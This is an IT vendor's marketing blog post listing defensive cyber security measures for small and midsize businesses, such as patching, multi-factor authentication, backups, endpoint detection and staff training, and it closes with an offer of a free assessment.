14 Foundational Cyber Security Measures Small & Midsize Businesses Need in 2021
Hackers are getting more sophisticated. The minimum security protections that businesses need to defend against cyber criminals has changed.
As cyber criminals have advanced the technology they use to sneak in (or bust through) network doors, the list of must-have cyber security "basics" has expanded.
To have a fighting chance, you need a layered cyber security strategy.
It might be hard to know what those layers should be if you're not a technology specialist. You may just have a gut feeling that what you’re doing right now isn't enough. We're here to help.
Here are 14 foundational cyber security measures that small and midsize businesses need in 2021 to protect against today's threats.
Cyber Security Basics For a Strong Foundation
- Anti‐Virus / Anti‐Malware
- Patch Management
- Firewall Management
- Windows Log Alerts
- Password Policy
- Multi‐Factor Authentication
- Secure Internet Gateway
- Gateway Anti‐Virus
- Backup and Disaster Recovery
- Active Directory Management
- Office 365 Email Encryption
- Endpoint Detection & Response
- Security Awareness Training
Hackers have many methods of installing malware on computers. Whether it’s through a compromised website or clicking a link in a phishing email, viruses, worms and trojans can wreak havoc once they’ve made their way onto an employee’s computer -- and then to your network.
Once in place, malware can monitor and steal information from your system, encrypt your data and demand a ransom, or cause other damage including corrupting your hard drive.
Anti-virus and anti-malware have long been cyber security standards and they continue to be a must-have layer of defense. These programs scan the devices on your network looking for known malware. Once found the unwanted program is quarantined so that it can’t spread. Then actions are taken to remove it from the affected devices.
Anti-spam programs prevent fraudulent email messages from entering your systems. Spam emails can appear to be from people or organizations that you know, like an executive at your company or a business that is well known like UPS or Amazon. Through social engineering, these messages entice people to click on a link or open an attachment which then downloads a malware payload.
Anti-spam software works using a system of protocols to identify unwanted messages and stop them from actually entering the user's inbox. With the most modern anti-spam software, you can customize the settings according to your needs. This way, you can approve some emails, which might seem like spam to enter your mail. You also have the option of creating a personal whitelist, allowing certain senders while blocking others.
3. Patch Management
Patch management refers to the maintenance you do to software to close vulnerability holes. Software developers support their products by regularly releasing updates as weaknesses are detected. In addition to patching newly found security holes, updates can also include changes that improve the performance of the software.
Cyber criminals are actively looking for computers that are running unpatched or out-of-support software so that they can exploit known vulnerabilities. This includes your operating systems as well as any software that you’re using on your servers, workstations, laptops, and connected devices.
Your IT team should be reviewing, testing, and deploying patches on an ongoing basis.
4. Firewall Management
Firewalls are a primary barrier between all your sensitive data and cyber criminals. A firewall examines all incoming and outgoing traffic on your network. It controls this traffic by following sets of rules that determine what is allowed and not allowed – or trusted and not trusted.
Firewalls need diligent management to make sure that there aren’t any holes where cyber criminals can sneak in. This includes proper configuration, testing, and regular updates. Employees working from home should also have firewalls on their home network.
5. Windows Log Alerts
Your Windows operating system has the ability to keep a record of all the activity that takes place on a computer. Some of the information that’s gathered is used by network administrators to monitor and tweak performance, and some of the information is related to security.
As security logs are created, they can send out automated alerts when there’s something that’s suspicious. For example, a login attempt from a specific geographical location could mean a hacker is trying to force a password. Another example is an excessive use of computing power, signaling that the computer has possibly been commandeered into a botnet.
6. Password Policy
According to Verizon's 2020 Data Breach Investigations Report, about 80 percent of breaches due to hacking involve stolen, lost, or weak passwords. This is mainly because most businesses do not enforce password policies. A password policy is a specific set of rules meant to enhance the security of your network. It mostly involves encouraging users to set up strong passwords and use them properly.
It's advised that passwords be changed every 2-3 months.
Most organizations include password policies in their company handbook or separate Acceptable Use Policy.
Some organizations set up programs to train the employees on security and effective password-setting techniques. For instance, the password should not be obvious or based on personal information that can be easily found like birthdays or anniversaries. Strong passwords should consist of a combination of upper and lower-case letters, symbols, and numbers.
7. Multi-factor Authentication (MFA)
Multi-factor identification (MFA) is becoming increasingly popular as a means of securing the login process. It works by requiring an individual to take another step to verify their identity when logging into an account. It works because it’s highly unlikely that a hacker would have both the accurate password and the means to complete the next step, like insert a code that is received on their mobile device.
You can combine MFA with windows log alerts that notify you when someone is logging into one of your accounts or an account that you monitor. The alerts send you an email or text message any time an event of interest occurs, so you can verify that the login is legitimate or not.
8. Secure Internet Gateway
If you're doing any operations over the internet (and who isn’t??), you need some additional protection for the traffic going in and out of your network to the web with a secure internet gateway.
It's similar to (but not the same as) a firewall. It's basically a protocol that helps establish secure connections to your network, websites, and other systems online. It works by blocking any insecure traffic from coming into your internal network.
Businesses use Secure Internet Gateway as another layer of security to protect their users from any malicious internet traffic or suspicious malware as they browse. It's especially useful for remote workers or devices being used in other branches outside the office.
9. Gateway Anti-Virus
Modern firewalls have some additional capabilities that help businesses build up the digital perimeter around their network -- gateway anti-virus is one of them. This program works in a manner similar to standard anti-virus, in that it looks for known malware programs and takes action to shut them down.
Your firewall's job is to control traffic in and out of your network, so having gateway anti-virus allows you to spot and shut down malware in emails or web pages BEFORE they even get to employee workstations and laptops. Humans are prone to make mistakes and can be manipulated into clicking, downloading, or browsing that triggers a download of malware. Gateway anti-virus means you’re putting one more layer between the bad guys and your employees.
10. Backup and Disaster Recovery
In the event that hackers manage to penetrate your security perimeter and processes, you need to have a contingency plan. Data backup and disaster recovery are important components of your response. Your backup plan should be based on what data you need to resume operations, and how long you can afford to be down. These are known as your recovery points.
Data backup used to be considered insurance against ransomware because all you needed to do would be restore your system if your data was taken hostage. Not anymore. Cyber criminals are now using extortion to get organizations to pay their ransom, threatening to expose data for all to see on the web.
Back up your data as part of your incident response plan, but don’t rely on it to be your ONLY response.
11. Active Directory Management
Active Directory acts as a central user management tool and is important for security in a couple of ways.
First, it’s a way that you can enforce some of your data access policies. Through Active Directory you can allow or deny users to take certain actions or touch certain files based on what they need to know for their job role.
If behavior for a user falls outside of the permissions that are set up, then Windows Log Alerts can trigger a notification. Follow-up is then needed to determine if the behavior was an authentic threat or just an error.
Active Directory has security features that are very familiar to hackers so proper management is essential -- just imagine what a bad guy could do if they stole the power to change accounts and permissions! Proper management includes configuring the program so that it’s not set at default for security, and diligent password and identity management by the administrators who have control.
12. Office 365 Email Encryption
Microsoft Office 365 is one of the most convenient office applications that businesses use nowadays. The cloud-based platform gives people the tools they need and enables collaboration through various email and calendaring applications, as well as Microsoft Teams. Plus, you can use it on any device, at any time.
However, the fact that it is online-based makes it prone to hacks and this is where Office 365 Email Encryption comes in. It has various encryption options you can use to enhance security for emails sent in Office 365. You can encode any sensitive information you might want to send out and have it so that only the intended party can decode it.
To create a secure message, just create a new email in Outlook and select 'Options tab,' then choose the Encrypt option and click on the restrictions you want to set up.
13. Endpoint Detection and Response (EDR)
While antivirus scans for known malware, you need to protect your network from unknown malware.
This is where Endpoint Detection and Response (EDR) comes in. EDR is software powered by Artificial Intelligence (AI) that studies your network and determines what is normal. Then, when something happens that’s abnormal, it stops it and sends an alert.
EDR has been developed in response to cyber criminals' evolving tactics. If you’re only defending against known malware, you’ll always be behind. EDR should be deployed on all of the devices that are connected to your network, from workstations and laptops, to tablets and Internet of Things (IoT) devices.
14. Security Awareness Training
Any IT security professional will tell you that the weakest link in a company's security is its employees. Hackers use social engineering techniques and phishing to exploit unsuspecting employees to extract sensitive information and gain access to computers and networks.
This can all be countered with ongoing employee security awareness training programs. This is where all employees who have access to your network are formally trained on all the best practices involving security. They are educated about the system's common security threats and vulnerabilities and how they can be coaxed into allowing a security breach. The goal of training is to teach each member of the team to actively spot clues that indicate threats and use this to prevent potential cyber attacks.
For best results, security awareness training needs to be a continuous process, included when onboarding new employees, and ongoing to keep all employees updated with new trends in the field.
Strategically Combine Layers for Best Cyber Security
While this article describes many cyber security tactics, the way they’re combined makes a big difference in how effective they’re going to be. You can’t just cobble together a bunch of tools and hope for the best. You’ll get your best protection when you have experts at the helm, determining what technology tools will create a strong defense, and supporting them with non-technical policies that guide employee behavior.
Get a Cyber Security Assessment
It can be tough for a small IT support team to manage cyber security for businesses. Cyber security is a specialized expertise that's different from traditional IT management.
Contact us today for a free cyber security assessment.
About Peter O'Campo
Peter O’Campo is Chief Technology Officer of Accent Computer Solutions, Inc. He earned his B.S. in Accounting from Azusa Pacific University in 1996. Prior to working for Accent, he successfully grew and sold three information technology companies. In his role as Accent’s CTO, Peter is responsible for advancing technology and increasing efficiency for both Accent and its clients. He stays up-to-date on the IT industry, evaluates new technology to stay ahead of the competition, implements technologies and processes to make staff more effective, as well as reviews and refines existing processes for efficiency.